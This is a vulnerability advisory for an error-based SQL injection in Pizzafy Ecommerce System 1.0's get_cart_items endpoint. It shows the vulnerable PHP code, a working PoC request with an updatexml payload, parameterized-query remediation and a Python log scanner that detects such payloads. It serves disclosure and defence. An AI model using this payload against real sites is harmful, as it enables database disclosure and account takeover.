# Pizzafy Ecommerce System 1.0 SQL Injection Vulnerability Summary

## Vulnerability Overview

* **Affected Version**: Pizzafy Ecommerce System 1.0
* **Vulnerability Type**: Error-Based SQL Injection
* **Severity**: HIGH
* **Vulnerable Location**: `/pizzafy/admin/ajax.php?action=get_cart_items&id=6`
* **Description**: In the `select` functionality of `get_cart_items`, the `id` GET parameter replaces the session's `user_id` and is concatenated into the `WHERE c.user_id = ...` clause without sanitization, allowing attackers to inject malicious SQL commands into backend database queries. Because the raw database error is returned in the response, the injection can be exploited error-based.

## Impact Scope

* **Confidentiality**: Full disclosure of database schema and user credentials.
* **Integrity**: Unauthorized deletion or modification of records.
* **Availability**: Service denial due to large-scale data deletion.
* **Privilege Escalation**: Session hijacking and administrative access.

## Proof of Concept (PoC)

**1. Vulnerable Code**

```php
public function get_cart_items() {
    if (!isset($_SESSION['login_user_id'])) {
        return ['items' => []];
    }
    $user_id = $_SESSION['login_user_id'];
    // Attacker-controlled override: any GET `id` replaces the session user id
    if (isset($_GET['id'])) {
        $user_id = $_GET['id'];
    }
    // Sink: $user_id is interpolated directly into the SQL string
    $sql = "SELECT c.id as cart_id, c.product_id, c.qty, p.name, p.price
            FROM cart c
            JOIN product_list p ON c.product_id = p.id
            WHERE c.user_id = $user_id";
    $result = $this->conn->query($sql);
    if (!$result) {
        // The database error text is sent back to the client
        return ['items' => [], 'error' => $this->conn->error];
    }
    $items = [];
    $total = 0;
    if ($result && $result->num_rows > 0) {
        while ($row = $result->fetch_assoc()) {
            $subtotal = $row['price'] * $row['qty'];
            $total += $subtotal;
            $items[] = [
                'cart_id'    => $row['cart_id'],
                'product_id' => $row['product_id'],
                'name'       => $row['name'],
                'qty'        => $row['qty'],
                'price'      => (float)$row['price'],
                'subtotal'   => (float)$subtotal
            ];
        }
    }
    return ['items' => $items, 'total' => $total];
}
```

**2. Exploit Payload**

```http
GET /pizzafy/admin/ajax.php?action=get_cart_items&id=6%20AND%20updatexml(1,concat(0x7e,database()),1)%23 HTTP/1.1
Host: localhost
sec-ch-ua: 
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/pizzafy/index.php?page=home
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=jeju15623h3yxadwq12jpr94i
Connection: close
```

## Remediation

**1. Remediation Code**

```php
public function get_cart_items() {
    if (!isset($_SESSION['login_user_id'])) {
        return ['items' => []];
    }
    // Only the authenticated session decides whose cart is read; cast to int
    $user_id = (int)$_SESSION['login_user_id'];
    // Remove the code that let a GET parameter override the user id:
    // if (isset($_GET['id'])) {
    //     $user_id = $_GET['id'];
    // }
    $stmt = $this->conn->prepare("SELECT c.id as cart_id, c.product_id, c.qty, p.name, p.price
                                  FROM cart c
                                  JOIN product_list p ON c.product_id = p.id
                                  WHERE c.user_id = ?");
    if ($stmt === false) {
        // prepare() returns false on failure; do not call bind_param() on it
        error_log("Erro em get_cart_items: " . $this->conn->error);
        return ['items' => []];
    }
    $stmt->bind_param("i", $user_id);
    $stmt->execute();
    $result = $stmt->get_result();
    if (!$result) {
        // Log server-side only; never return database errors to the client
        error_log("Erro em get_cart_items: " . $stmt->error);
        return ['items' => []];
    }
    $items = [];
    $total = 0;
    if ($result && $result->num_rows > 0) {
        while ($row = $result->fetch_assoc()) {
            $subtotal = $row['price'] * $row['qty'];
            $total += $subtotal;
            $items[] = [
                'cart_id'    => $row['cart_id'],
                'product_id' => $row['product_id'],
                'name'       => $row['name'],
                'qty'        => $row['qty'],
                'price'      => (float)$row['price'],
                'subtotal'   => (float)$subtotal
            ];
        }
    }
    return ['items' => $items, 'total' => $total];
}
```

**2. Mitigation Recommendations**

1. **Use Prepared Statements**: Employ parameterized queries so user input is never interpolated into SQL.
2. **Input Validation**: Validate the `id` parameter and the value compared against the `user_id` column, allowing only expected values (a single integer).
3. **Database Permissions**: Restrict the application's database user privileges to limit the potential damage of SQL injection.
4. **Monitoring and Logging**: Track and alert on anomalous patterns, such as SQL syntax in request parameters or repeated failing requests to the same endpoint.
5. **Security Testing**: Conduct regular penetration testing and code reviews to identify and mitigate vulnerabilities.
6. **Error Handling**: Avoid exposing database-related errors in responses, as this may assist attackers.
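To make recommendation 4 concrete, the following is an added detection example (not part of this advisory or the Pizzafy code) that scans web-server access logs in common log format for requests to the vulnerable action whose `id` parameter is not a bare integer. The log lines are constructed; the path and action name come from the advisory, the marker list and log format are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic). Line 3 carries the
# error-based payload from this advisory; line 4 is a malformed id value.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /pizzafy/admin/ajax.php?action=get_cart_items&id=6 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /pizzafy/index.php?page=home HTTP/1.1" 200 2048
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /pizzafy/admin/ajax.php?action=get_cart_items&id=6%20AND%20updatexml(1,concat(0x7e,database()),1)%23 HTTP/1.1" 200 180
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /pizzafy/admin/ajax.php?action=get_cart_items&id=6%27 HTTP/1.1" 200 180
"""

# Assumed common log format: ip identd user [timestamp] "METHOD target proto" status
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

VULN_PATH = "/pizzafy/admin/ajax.php"
VULN_ACTION = "get_cart_items"
# MySQL functions typical of error-based extraction (as seen in the PoC)
ERROR_BASED_MARKERS = ("updatexml(", "extractvalue(", "database()")

def parse_request(line):
    """Split one access-log line into ip, path, status and decoded query params."""
    m = REQUEST_RE.match(line)
    if m is None:
        return None
    ip, _method, target, status = m.groups()
    parts = urlsplit(target)
    # parse_qs percent-decodes, so %20 -> ' ' and %23 -> '#'
    params = parse_qs(parts.query, keep_blank_values=True)
    return {"ip": ip, "path": parts.path, "params": params, "status": int(status)}

def scan_log(text):
    """Flag requests to the vulnerable action whose `id` is not a bare integer."""
    findings = []
    for line in text.splitlines():
        req = parse_request(line)
        if req is None or req["path"] != VULN_PATH:
            continue
        if req["params"].get("action") != [VULN_ACTION]:
            continue
        for raw_id in req["params"].get("id", []):
            if raw_id.isdigit():  # expected shape: a positive integer only
                continue
            lowered = raw_id.lower()
            kind = "error-based sqli" if any(k in lowered for k in ERROR_BASED_MARKERS) else "malformed id"
            findings.append({"ip": req["ip"], "id": raw_id, "kind": kind})
    return findings
```

Feeding the real access log to `scan_log` and alerting on any finding catches the PoC request as well as other non-integer probes against the same parameter.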